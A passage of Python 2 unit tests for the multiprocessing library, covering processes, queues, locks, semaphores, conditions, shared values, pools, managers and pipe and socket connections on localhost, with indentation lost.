'HAVE_BROKEN_SEM_GETVALUE', False)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
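# Usage sketch (comment added for illustration): the tests below wrap blocking
# calls so their duration can be asserted, for example:
#   put = TimingWrapper(queue.put)
#   self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
#   self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)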
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
return
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertTrue(isinstance(authkey, bytes))
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def _test(self, q, *args, **kwds):
current = self.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if self.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEquals(p.authkey, current.authkey)
self.assertEquals(p.is_alive(), False)
self.assertEquals(p.daemon, True)
self.assertTrue(p not in self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEquals(p.exitcode, None)
self.assertEquals(p.is_alive(), True)
self.assertTrue(p in self.active_children())
self.assertEquals(q.get(), args[1:])
self.assertEquals(q.get(), kwargs)
self.assertEquals(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEquals(q.get(), current.authkey)
self.assertEquals(q.get(), p.pid)
p.join()
self.assertEquals(p.exitcode, 0)
self.assertEquals(p.is_alive(), False)
self.assertTrue(p not in self.active_children())
def _test_terminate(self):
time.sleep(1000)
def test_terminate(self):
if self.TYPE == 'threads':
return
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertTrue(p in self.active_children())
self.assertEqual(p.exitcode, None)
p.terminate()
join = TimingWrapper(p.join)
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertTrue(p not in self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertTrue(p not in self.active_children())
p.start()
self.assertTrue(p in self.active_children())
p.join()
self.assertTrue(p not in self.active_children())
def _test_recursion(self, wconn, id):
from multiprocessing import forking
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = self.Process(
target=self._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
def _test_put(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(Queue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
def _test_get(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(Queue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(Queue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(Queue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
def _test_fork(self, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(Queue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
return
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
def _test_task_done(self, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
if sys.version_info < (2, 5) and not hasattr(queue, 'task_done'):
return
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in xrange(4)]
for p in workers:
p.start()
for i in xrange(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
return
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
def f(self, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in xrange(6):
sleeping.acquire()
# check they have all timed out
for i in xrange(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in xrange(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
class _TestEvent(BaseTestCase):
def _test_event(self, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
#self.assertEqual(event.is_set(), False)
self.assertEqual(wait(0.0), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
# self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
self.Process(target=self._test_event, args=(event,)).start()
self.assertEqual(wait(), None)
#
#
#
class _TestValue(BaseTestCase):
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def _test(self, values):
for sv, cv in zip(values, self.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if self.TYPE != 'processes':
return
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
if self.TYPE != 'processes':
return
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
class _TestArray(BaseTestCase):
def f(self, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
def test_array(self, raw=False):
if self.TYPE != 'processes':
return
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
def test_rawarray(self):
self.test_array(raw=True)
def test_getobj_getlock_obj(self):
if self.TYPE != 'processes':
return
arr1 = self.Array('i', range(10))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', range(10), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', range(10), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(range(10))
self.assertEqual(a[:], range(10))
b = self.list()
self.assertEqual(b[:], [])
b.extend(range(5))
self.assertEqual(b[:], range(5))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], range(10))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = range(65, 70)
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
class _TestPool(BaseTestCase):
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10)))
self.assertEqual(pmap(sqr, range(100), chunksize=20),
map(sqr, range(100)))
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 0.2))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, range(10))
self.assertEqual(list(it), map(sqr, range(10)))
it = self.pool.imap(sqr, range(10))
for i in range(10):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
it = self.pool.imap(sqr, range(1000), chunksize=100)
for i in range(1000):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, range(1000))
self.assertEqual(sorted(it), map(sqr, range(1000)))
it = self.pool.imap_unordered(sqr, range(1000), chunksize=53)
self.assertEqual(sorted(it), map(sqr, range(1000)))
def test_make_pool(self):
p = multiprocessing.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
if self.TYPE == 'manager':
# On Unix a forked process increfs each shared object to
# which its parent process held a reference. If the
# forked process gets terminated then there is likely to
# be a reference leak. So to prevent
# _TestZZZNumberOfObjects from failing we skip this test
# when using a manager.
return
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertTrue(join.elapsed < 0.2)
#
# Test that manager has expected number of shared objects left
#
class _TestZZZNumberOfObjects(BaseTestCase):
# Because test cases are sorted alphabetically, this one will get
# run after all the other tests for the manager. It tests that
# there have been no "reference leaks" for the manager's shared
# objects. Note the comment in _TestPool.test_terminate().
ALLOWED_TYPES = ('manager',)
def test_number_of_objects(self):
EXPECTED_NUMBER = 1 # the pool object is still alive
multiprocessing.active_children() # discard dead process objs
gc.collect() # do garbage collection
refs = self.manager._number_of_objects()
if refs != EXPECTED_NUMBER:
print self.manager._debug_info()
self.assertEqual(refs, EXPECTED_NUMBER)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in xrange(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('next', '__next__')
def __iter__(self):
return self
def next(self):
return self._callmethod('next')
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
manager.shutdown()
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = Queue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def _putter(self, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
queue.put(('hello world', None, True, 2.25))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
self.assertEqual(queue.get(), ['hello world', None, True, 2.25])
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _echo(self, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', range(4))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort, e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(IOError, reader.send, 2)
self.assertRaises(IOError, writer.recv)
self.assertRaises(IOError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
return
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _test(self, address):
conn = self.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
#
# Test of sending connection and socket objects between processes
#
"""
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _listener(self, conn, families):
for fam in families:
l = self.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
if self.TYPE == 'processes':
l = socket.socket()
l.bind(('localhost', 0))
conn.send(l.getsockname())
l.listen(1)
new_conn, addr = l.accept()
conn.send(new_conn)
conn.recv()
def _remote(self, conn):
for (address, msg) in iter(conn.recv, None):
client = self.connection.Client(address)
client.send(msg.upper())
client.close()
if self.TYPE == 'processes':
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
try:
